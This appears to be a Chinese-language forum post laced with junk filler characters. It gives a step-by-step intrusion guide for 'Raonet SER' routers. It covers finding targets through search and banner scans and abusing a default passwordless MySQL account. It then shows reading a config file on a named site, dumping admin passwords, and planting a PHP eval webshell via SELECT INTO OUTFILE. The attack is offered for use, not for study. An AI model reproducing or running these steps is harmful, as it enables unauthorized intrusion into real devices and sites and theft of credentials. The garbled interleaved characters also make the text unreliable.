寻找存在漏洞的路由器方法:
, R3 C2 B8 p2 v
) Z3 W; k: X2 l6 `3 I1:google搜索'Raonet Subscriber Ethernet Router'( W* p; b- `! z
( Q$ Q3 T* D* ?" R n" h9 ]1 m- ?
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
3 _. I. k2 v# R/ l, f3 ?6 B* f) J. ?3 v* U! \* t# |
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。- m7 f. t+ R6 s8 Y& C; S8 O
6 J. L2 K, x- r: Q4 q//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......! N. @* J, P: z$ z& y
4 V' F8 B( V w, l
! d) p' G2 I. I* i9 ?6 ]% `( `( r1 G* n7 @/ D' v" O- p( M2 d
入侵步骤:$ Y* ~9 U, D1 {6 R' }0 [
4 c' j8 p2 ^: K L1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php/ b" H* v+ W' L/ p4 k2 M
2 k( k% n# Q/ s7 i4 ^
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
7 a* W, y3 J# B) a. M3:得到密码后连接,查看GUI管理密码:
, p9 K& y z9 Y8 G) xuse ser_500
8 X g- q+ N0 P% Iselect id,passwd from user;
; i* Z7 A) n- G( Z4:通过数据库写入webshell,执行命令:: f0 O I! ^+ m8 J
use mysql;
; n$ q# y5 `7 X! w, ucreate table ok(cmd TEXT);' U9 j7 G* P7 l5 N+ S# m
insert into ok values("<?php @eval($_POST[cmd])?>");
, u8 Q$ n9 n" k9 Mselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";7 ]$ l8 @% e& z
drop table ok;/ e% F, u) L, n( [
3 k2 d, {' d* N1 `2 r& M5:连接后门shell.php
1 i% u( K6 B5 N
7 I- a6 P& x; \! S6. 搞定!9 J9 t! A( q4 W' U
! N5 o: C& O2 c2 h+ f
|